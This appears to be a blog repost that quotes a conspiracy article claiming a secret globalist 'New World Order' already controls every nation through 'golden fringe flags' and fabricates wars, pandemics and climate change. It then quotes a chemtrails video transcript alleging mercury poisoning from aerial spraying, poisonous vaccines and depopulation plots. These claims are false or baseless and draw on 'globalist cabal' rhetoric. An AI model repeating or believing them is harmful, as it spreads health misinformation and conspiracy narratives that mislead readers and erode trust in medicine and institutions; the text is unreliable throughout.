    In addition to scaring you into accepting their „solution“ to their frightening problem, they require you to abandon your rights. This is done to accommodate the requirements of their New World Order. This system is based on hybrid socialism/communism which requires the abandonment of personal rights. Globalists not only profit from the fear-based process of establishing global government, they also gain vast control over the entire world, and by utilizing fear, they accomplish it all with public consent.
    Censorship is central to this entire scheme. If the public knew that the threat was being artificially induced or that the solution to the problem was easy, there would not be enough fear to cause people to abandon their rights. Concealing the entire scheme from the public is critical for the scheme to succeed, and so we have vast censorship.
    See: Daily Log: Biologic Chemtrails Occurred Precisely with COVID and With Second Wave:
    http://globalskywatch.com/chemtrails/ubbthreads.php?ubb=showflat&Number=23435#Post23435
    One of the most effective forms of censorship is self censorship. This is achieved through social pressure. The schemers make it unfashionable and ugly to believe that a scheme even exists. They apply socially demeaning labels to those informed of the scheme by calling them paranoid or ignorant. They associate a belief in the scheme with the word „theory“ to create the illusion that the scheme is just an idea without sufficient evidence or proof. The result is self-censorship. The person avoids talking about the scheme – or even knowing about the scheme – because they don’t want to be considered paranoid or ignorant in their social circles. This type of social conditioning is present in the vast majority of news and entertainment today. This is no surprise considering that all such media is owned by the same globalists. We have history as our teacher. The methods of controlling and enslaving populations is nothing new. What is new is the technology that enables lies, social pressure, and fake science to blanket the world in seconds.
    See: Mainstream Media and Propaganda:
    http://orbisvitae.com/ubbthreads/ubbthreads.php?ubb=postlist&Board=342&page=1#.XyGoaW1KhrQ
    See: Science Journal Editors: 50% of Published Research May Be False:
    http://globalskywatch.com/chemtrails/ubbthreads.php?ubb=showflat&Number=20336#Post20336
    See Milgram’s Obedience to Authority Experiment:
    http://orbisvitae.com/ubbthreads/ubbthreads.php?ubb=showflat&Number=60294&Searchpage=1&Main=14005&Words=%2Bmilgram&Search=true#Post60294
    See: Operation Mockingbird: The CIA Control of the News:
    http://orbisvitae.com/ubbthreads/ubbthreads.php?ubb=showflat&Number=68987#Post68987
    During many interviews, I have stated that the New World Order is already here, that all countries of the world are already conquered and controlled by the globalists. This statement is difficult for some to accept, yet this absolutely must be understood in order to truly comprehend the state of the world. Those who do not understand this will be fundamentally deceived by the globalists‘ plan for the world. Your freedom and your very life depend on avoiding the globalists‘ deceptive scheme.
    This is the key to the entire mystery: Every country flying a golden fringe flag has already been taken over by globalists.
    The globalists‘ UCC system is fully operational in these countries. The New World Order system is already in place and in power there. The country flying the golden fringe flag has already been economically conquered and is wholly controlled by the same globalist cabal that controls the U.S. Federal Reserve Bank.
    So which countries fly the golden fringe flag?
    All of them… Every single one.
    Yes, this includes China and Russia.
    What does this mean? This means that every country in the world is under globalist control. The conquering of the nations of the world had to be accomplished in secret because the public never would have allowed it to occur had they known.
    Some are deceived by the idea that nations have conflicts. These conflicts are theater. They are there to convince the public that nations are sovereign and independent. Globalists cannot reveal that all nations actually work closely together towards global government because the public has the power to stop their plan. Until the public actually desires and approves of globalism, the globalists must continue to promote the facade that it doesn’t exist.“

    Conspiracy Revelation: 17.9.2020: Exactly… it´s so obvious especially those who know about the Secret Space Programs of the earliest stages, know they all worked always together…The Double Play is over. The Truman-Show will crumble soon.

    „Once the public approves of one world government, only then will it appear to be constructed in public view. This construction process will further convince the public that no secret scheme exists.
    Global government cannot be accepted by the public until nationalism and patriotism are destroyed. This is the reason you have seen both being demeaned in news and entertainment for decades. Every time you hear „nationalism“ (often called „white nationalism“) being demeaned in media, you are watching the globalists‘ brainwashing machine at work condemning your freedom and your country.
    Global government, which is essentially global socialism/communism, cannot be accepted by the public until the national united States falls. This country which, represents freedom and self-governance to the world, must crumble so the globalists can blame the fall on personal freedom which they generally refer to as „capitalism“. This is all being artificially synthesized in order to demonize your freedom and to make socialism/communism acceptable to the public. This is the reason nationalism and patriotism are incessantly shamed in mainstream media news and entertainment.
    The only remaining step globalists must take is to legitimize global government in the public eye. They do this by artificially creating global problems that they claim can only be solved by a supra-national, global government that will have regulatory power over all nations. The problems that are being created include war, pollution, terrorism, pandemics, global warming, and even asteroids. You can see all of this playing out before you right now in globalist-owned mainstream media.
    Once you grasp this information, you will see through the globalists‘ schemes and will be equipped to make intelligent decisions that will help you preserve your freedom and your very life.
    See: The Final Threats That Will Be Used To Implement Global Government
    Clinton gave U.S. multi-warhead ICBM missile technology to China during his presidency.
    The U.S. and Russia conducted space research together during the „Cold War“.
    Countless examples of intimate cooperation between perceived „enemy“ nations exists throughout recent history. This cooperation was always omitted by mainstream media while the „threat“ of the „enemy“ nation was exemplified. Globalist-owned military contractors profit immensely by promoting „threats“ from other nations.
    It’s Your Move, Hesitate or Die
    The national united States was founded upon the premise of purging government corruption, but now it’s up to you. Will you succumb to social pressure and remain censored, or will you stand up, group together and end the corruption? Always remember that schemes against the public are conducted in secret because the public has the power to stop them. If the public did not have this power, there would be no reason for secrecy.
    You have 2 choices:
    Stand up and make history, or
    Sit down and allow the schemers to make history.
    As always, the choice is up to you.
    If there is one piece of information that I wish for you to take away from this article, it is this:
    If you knew what the schemers had in store for you, you would make the right decision without hesitation. …“
    Source: http://orbisvitae.com/ubbthreads/ubbthreads.php?ubb=showflat&Number=92184#Post92184

  • Chemtrails & Illuminati Luciferianism – 3/14/2016


    „3/14/2016: Chemtrails & Illuminati Luciferianism
    729 Aufrufe•20.03.2016“
    „GlobalSkywatch: 2010 Abonnenten: http://GlobalSkywatch.com
    Illuminati Luciferianism: Who are they? Why do they do what do? We are looking at the deeper, darker side of those who feel entitled to depopulate you and me.“
    „This is in the Air and it´s affecting everybody and to ignore it is a crime of intentional neglect. We have to be involved.“
    „Mercury rising in Americans from 3% to 30% between 1999 and 2006.“
    „2006: Right at the same time spraying went crazy…Everything has a cause, it´s not magic, it´s not smoke and mirrors, everything has a cause and it´s right in front of your face. 2005 was the year where most people saw dramatic increases of chemtrail spraying, the mercury in these tests are inorganic..in other words.. it´s coming from a large distribution source…they are associated with the intensity of chemtrails in the sky and in the air that have descended to ground level.“
    „That has fooled Doctors for a long Time, even when it is known in Medicine for a long time.“
    „Doctors have not been probably taught this.
    Because the Blood Test I have been given was worthless, don´t fall into that trap.“
    „They want to make the environment dirty while appearing to care.“
    „Mercury found in fog off California Coast.“

    „Now of course we know vaccines contain massive poisons.“
    „It´s just unbelievable that people tolerate these lies.“